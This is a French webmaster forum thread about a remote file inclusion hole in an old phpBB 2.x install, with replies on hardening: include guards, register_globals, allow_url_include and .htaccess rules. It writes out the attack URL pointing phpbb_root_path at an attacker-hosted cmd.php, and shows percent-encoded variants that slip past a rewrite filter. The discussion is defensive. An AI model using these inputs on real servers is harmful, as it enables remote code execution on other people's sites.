[RESOLU] Faille de sécurité PHPBB

[EasyExpat]

Salut

Bon, j'ai été attacké cette nuit donc je fais partager et les solutions de sécurité sont les bienvenues. Voila ce qui s'est passé (c'est déja documenté sur le net):

Code: Tout sélectionner

Arbitrary File Inclusion:
http://[target]/includes/functions.php?phpbb_root_path=http://[attacker]/cmd.php

Documenté ici :
http://www.frsirt.com/english/advisories/2007/0451

ou ici:
http://secwatch.org/advisories/1015365/

Donc j'ai tourné url_fopen off dans php afin que cette vulnérabilité ne puisse etre utilisée. Ceci dit, ca me gene sur d'autres aspecs du site, donc toute solution de sécurisation serait la bienvenue...Par exemple checker la valeur retour et interdire si elle commence par http ?? Dans quels fichier ?

Merci d'avance des suggestions et correctifs...

[darkjukka]

Code: Tout sélectionner

if ( !defined('IN_PHPBB') && !defined('IN_PORTAL') ) {
   die('Hacking attempt');
   exit;
}

Au début des fichiers de ce genre évite les inclusions comme cela

[loran750]

Euh ...

1/ ça date de 2007
2/ ça ne concerne pas PhpBB mais un clode nommé PhpBB XS (renommé depuis en Icy Phoenix).

Donc rien à voir avec PhpBB !

[EasyExpat]

Euh ...

1/ ça date de 2007
2/ ça ne concerne pas PhpBB mais un clode nommé PhpBB XS (renommé depuis en Icy Phoenix).

Donc rien à voir avec PhpBB !

Désolé de te contredire, loran750 mais j'utilise bien phpBB 2.0.21
Il se trouve seulement que la faille est a plusieurs niveaux. Tu veux que j'essaye sur ton forum

darkjukka> Mais il y a cette protection dans le code PHPBB au niveau du fichier common.php deja:

Code: Tout sélectionner

if ( !defined('IN_PHPBB') )
{
   die("Hacking attempt");
}

[darkjukka]

Je l'ai dans tout mes fichiers includes perso

Et puis ton phpBB n'est pas à jour, c'est la 2.0.23 en ce moment.

[webmasterlamogere]

il y a la solution htaccess pour bloquer : http://www.urlrewriting.fr/scripts58-Snipets.html

c'est à cause de register_globals à on

[EasyExpat]

c'est à cause de register_globals à on

Je sais

il y a la solution htaccess pour bloquer : http://www.urlrewriting.fr/scripts58-Snipets.html

Bon c'est super ca !! Merci

[Capitaine]

il y a la solution htaccess pour bloquer : http://www.urlrewriting.fr/scripts58-Snipets.html

Bon c'est super ca !! Merci

2 remarques :
- il manque "RewriteEngine On" juste au début (pas évident pour qqun qui débute)

- cette protection est inefficace :
http://[target]/?phpbb_root_path=%68ttp://[attacker]
ou
http://[target]/?phpbb_root_path=htt%70://[attacker]

passe quand meme

[polweb]

Pourquoi ne met tu pas

SetEnv REGISTER_GLOBALS 0

dans ton htaccess ?

C'est la base.


A plus.

[Bool]

Au lieu de désactiver l'URL fopen qui en lui même ne pose pas vraiment de problème, il est préférable de désactiver l'URL include qui lui ne rime à rien.

Code: Tout sélectionner

; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
allow_url_include = Off

Par contre cette option n'est disponible que depuis PHP 5.2.


PS : mais ça n'empêche pas de désactiver le register_globals et de corriger les failles...

[EasyExpat]

Au lieu de désactiver l'URL fopen qui en lui même ne pose pas vraiment de problème, il est préférable de désactiver l'URL include qui lui ne rime à rien.
Par contre cette option n'est disponible que depuis PHP 5.2.

PS : mais ça n'empêche pas de désactiver le register_globals et de corriger les failles...

Merci Par contre moi je suis en PHP Version 5.1.6

En ce qui concerne la remarque sur le register_globals, je sais, c'est dans la TODO list :-p